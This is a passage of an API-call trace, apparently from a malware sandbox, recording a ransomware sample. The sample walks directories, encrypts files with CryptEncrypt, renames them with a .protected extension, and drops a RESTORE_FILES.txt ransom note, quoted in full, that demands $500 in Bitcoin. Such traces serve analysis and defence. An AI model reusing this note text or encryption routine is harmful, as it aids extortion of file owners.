pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\*") returned 34 [0072.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.951] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.951] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.951] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.951] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.951] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.951] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\.") returned 34 [0072.951] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.951] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.958] lstrcmpiW 
(lpString1="..", lpString2="Windows") returned -1 [0072.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.958] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.958] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\..") returned 35 [0072.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.958] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.958] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="Windows") returned -1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="Program Files") returned -1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="Program Files (x86)") returned -1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="$Recycle.bin") returned 1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="System Volume Information") returned -1 [0072.958] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 73 [0072.958] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2=".") returned 1 [0072.958] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="..") returned 1 [0072.958] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*") returned 75 [0072.958] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0072.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.959] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.959] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.959] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.959] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\.") returned 75 [0072.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.959] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.959] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.959] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.959] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.959] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.959] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\..") returned 76 [0072.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.959] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="Program Files 
(x86)") returned -1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0072.959] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned 82 [0072.959] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0072.959] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*") returned 84 [0072.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0072.960] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.960] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.960] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.960] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.960] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\.") returned 84 [0072.960] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.960] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.960] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.960] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.960] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.960] lstrcmpiW (lpString1="..", 
lpString2="$Recycle.bin") returned 1 [0072.960] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\..") returned 85 [0072.960] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.960] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.960] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="Windows") returned -1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="Program Files") returned -1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="Program Files (x86)") returned -1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="$Recycle.bin") returned 1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="System Volume Information") returned -1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned 88 [0072.960] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0072.960] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*") returned 90 [0072.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0072.961] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.961] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.961] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.961] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.961] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\.") returned 90 [0072.961] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.961] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.961] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.961] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.961] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.961] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.961] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\..") returned 91 [0072.961] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.961] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.961] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned 92 [0072.961] lstrcmpW 
(lpString1="x64", lpString2=".") returned 1 [0072.961] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0072.962] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*") returned 94 [0072.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x447cc0 [0072.962] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.962] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.962] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.962] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.962] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.962] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\.") returned 94 [0072.962] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.962] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.962] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.962] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.962] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.962] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.962] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.962] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\..") returned 95 [0072.963] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0072.963] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.963] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Windows") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files (x86)") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$Recycle.bin") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="System Volume Information") returned 1 [0072.963] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0072.963] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".protected") returned 0x0 [0072.963] lstrcmpW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="RESTORE_FILES.txt") returned 1 [0072.963] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.965] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.965] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0073.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.081] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".txt") returned 0x0 [0073.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.081] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".rar") returned 0x0 [0073.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.081] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".zip") returned 0x0 [0073.081] ReadFile (in: hFile=0x14c, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.209] WriteFile (in: hFile=0x14c, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.209] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0073.210] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0073.210] 
CloseHandle (hObject=0x14c) returned 1 [0073.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 131 [0073.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.protected")) returned 1 [0073.211] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0073.211] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0073.211] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 110 [0073.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.211] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.211] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0073.213] lstrlenA (lpString="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") returned 684 [0073.213] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0073.213] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.213] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0073.214] CloseHandle (hObject=0xd8) returned 1 [0073.214] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.214] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.214] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt") returned 106 [0073.214] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.214] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.214] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.215] lstrlenA (lpString="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") returned 684 [0073.215] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.215] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.215] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.215] CloseHandle (hObject=0xd4) returned 1 [0073.216] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.216] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.217] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt") returned 100 [0073.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.219] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.219] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.220] lstrlenA (lpString="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") returned 684 [0073.220] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.220] lstrlenA 